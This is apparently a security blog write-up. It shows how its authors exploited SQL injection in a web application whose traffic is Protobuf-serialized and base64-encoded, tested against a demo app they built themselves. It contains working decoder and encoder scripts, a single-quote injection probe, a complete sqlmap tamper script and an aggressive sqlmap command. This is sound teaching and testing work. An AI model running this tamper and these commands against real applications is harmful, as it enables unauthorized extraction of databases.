brodobuf

TL;DR

Many developers believe that serializing traffic makes a web application more secure, as well as faster. That would be easy, right? The truth is that security implications remain if the backend code does not adopt adequate defensive measures, regardless of how data is exchanged between the client and server. In this article we will show you how the serialization canā€™t stop an attacker if the web application is vulnerable at the root. During our activity the application was vulnerable to SQL injection, we will show how to exploit it in case the communications are serialized with Protocol Buffer and how to write a SQLMap tamper for it.

Introduction

Hello friendsā€¦ Hello friendsā€¦ Here is 0blio and MrSaighnal, we didnā€™t want to leave all the space to our brother last, so we decided to do some hacking. During an activity on a web application we tripped over a weird target behavior, in fact during HTTP interception the data appeared encoded in base64, but after decoding the response, we noticed the data was in a binary format. Thanks to some information leakage (and also by taking a look at the application/grpc header) we understood the application used a Protocol buffer (Protobuf) implementation. Looking over the internet we found poor information regarding Protobuf and its exploitation methodology so we decided to document our analysis process here. The penetration testing activity was under NDA so in order to demonstrate the functionality of Protobuf we developed an exploitable web application (APTortellini copyrighted šŸ˜Š).

Protobuf primer

Protobuf is a data serialization format released by Google in 2008. Differently from other formats like JSON and XML, Protobuf is not human friendly, due to the fact that data is serialized in a binary format and sometimes encoded in base64. Protobuf is a format developed to improve communication speed when used in conjunction with gRPC (more on that in a moment). This is a data exchange format originally developed for internal use as an open source project (partially under the Apache 2.0 license). Protobuf can be used by application written in various programming languages, such as C#, C++, Go, Objective-C, Javascript, Java etcā€¦ Protobuf is used, among other things, in combination with HTTP and RPC (Remote Procedure Calls) for local and remote client-server communication, in particular for the description of the interfaces needed for this purpose. The protocol suite is also defined by the acronym gRPC.

For more information regarding Protobuf our best advice is to read the official documentation.

Step 1 - Playing with Protobuf: Decoding

Okay, soā€¦ our application comes with a simple search form that allows searching for products within the database.

brodobuf0

Searching for ā€œtortelliniā€, we obviously get that the amount is 1337 (badoom tsss):

brodobuf1

Inspecting the traffic with Burp we notice how search queries are sent towards the /search endpoint of the application:

request0

And that the response looks like this:

request1

At first glance, it might seem that the messages are simply base64 encoded. Trying to decode them though we noticed that the traffic is in binary format:

term0

elliot0

Inspecting it with xxd we can get a bit more information.

term1

To make it easier for us to decode base64 and deserialize Protobuf, we wrote this simple script:

#!/usr/bin/python3

import base64
from subprocess import run, PIPE

while 1:
    try:
        decoded_bytes = base64.b64decode(input("Insert string: "))[5:]
        process = run(['protoc', '--decode_raw'], stdout=PIPE, input=decoded_bytes)

        print("\n\033[94mResult:\033[0m")
        print (str(process.stdout.decode("utf-8").strip()))
    except KeyboardInterrupt:
        break

The script takes an encoded string as input, strips away the first 5 padding characters (which Protobuf always prepends), decodes it from base64 and finally uses protoc (Protobufā€™s own compiler/decompiler) to deserialize the message.

Running the script with our input data and the returned output data we get the following output:

term2

As we can see, the request message contains two fields:

  • Field 1: String to be searched within the database.
  • Field 2: An integer always equivalent to 0 Instead, the response structure includes a series of messages containing the objects found and their respective amount.

Once we understood the structure of the messages and their content, the challenge is to write a definition file (.proto) that allows us to get the same kind of output.

Step 2 - Suffering with Protobuf: Encoding

After spending some time reading the python documentation and after some trial and error we have rewritten a message definition similar to those that our target application should use.

syntax = "proto2";
package searchAPI;

message Product {

        message Prod {
                required string name = 1;
                optional int32 quantity = 2;
        }

        repeated Prod product = 1;
}

the .proto file can be compiled with the following command:

protoc -I=. --python_out=. ./search.proto

As a result we got a library to be imported in our code to serialize/deserialize our messages which we can see in the import of the script (import search pb2).

#!/usr/bin/python3

import struct
from base64 import b64encode, b64decode
import search_pb2
from subprocess import run, PIPE

def encode(array):
    """
    Function to serialize an array of tuples
    """
    products = search_pb2.Product()
    for tup in array:
        p = products.product.add()
        p.name = str(tup[0])
        p.quantity = int(tup[1])

    serializedString = products.SerializeToString()
    serializedString = b64encode(b'\x00' + struct.pack(">I", len(serializedString)) + serializedString).decode("utf-8")

    return serializedString

test = encode([('tortellini', 0)])
print (test)

The output of the string ā€œtortelliniā€ is the same of our browser request, demonstrating the encoding process worked properly.

term3

Step 3 - Discovering the injection

To discover the SQL injection vulnerability we opted for manual inspection. We decided to send the single quote ā€˜ in order to induce a server error. Analyzing the web application endpoint:

http://brodostore/search/PAYLOAD

we could guess that the SQL query is something similar to:

SELECT id, product, amount FROM products WHERE product LIKE ā€˜%PAYLOAD%ā€™;

It means that injecting a single quote within the request we could induce the server to process the wrong query:

SELECT id, product, amount FROM products WHERE product LIKE ā€˜%ā€™%ā€™;

and then producing a 500 server error. To manually check this we had to serialize our payload with the Protobuf compiler and before sending it encode it in base64. We used the script from step 2 by modifying the following lines:

test = encode([("'", 0)])

after we run the script we can see the following output:

term4

By sending the generated serialized string as payload to the vulnerable endpoint:

request2

the application returns HTTP 500 error indicating the query has been broken,

request3

Since we want to automate the dump process sqlmap was a good candidate for this task because of its tamper scripting features.

Step 4 - Coding the tamper

Right after we understood the behaviour of Protobuf encoding process, coding a sqlmap tamper was a piece of cake.

#!/usr/bin/env python

from lib.core.data import kb
from lib.core.enums import PRIORITY

import base64
import struct
import search_pb2

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload

    if payload:
        # Instantiating objects
        products = search_pb2.Product()
        
        p = products.product.add()
        p.name = payload
        p.quantity = 1

        # Serializing the string
        serializedString = products.SerializeToString()
        serializedString = b'\x00' + struct.pack(">I",len(serializedString)) + serializedString

        # Encoding the serialized string in base64
        b64serialized = base64.b64encode(serializedString).decode("utf-8")
        retVal = b64serialized

    return retVal

To make it work we moved the tamper in the sqlmap tamper directory /usr/share/sqlmap/tamper/ along with the Protobuf compiled library.

Here the logic behind the tamper workings:

logic0

Step 5 - Exploiting Protobuf - Control is an illusion

We intercepted the HTTP request and we added the star to indicate to sqlmap where to inject the code.

GET /search/* HTTP/1.1
Host: brodostore
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

anon0

After we saved the request in the test.txt file, we then run sqlmap with the following command:

sqlmap -r test.txt --tamper brodobug --technique=BT --level=5 --risk=3

sqlmap0

Why is it slow?

Unfortunately sqlmap is not able to understand the Protobuf encoded responses. Because of that we decided to take the path of the Boolean Blind SQL injection. In other words we had to ā€œbruteforceā€ the value of every character of every string we wanted to dump using the different response the application returns when the SQLi succeeds. This approach is really slow compared to other SQL injection technique, but for this test case it was enough to show the approach to exploit web applications which implement Protobuf. In the future, between one plate of tortellini and another we could decide to implement mechanism that decode the responses via the *.proto struct and then expand it to other attack pathsā€¦ but for now we are satisfied with that! Until next time folks!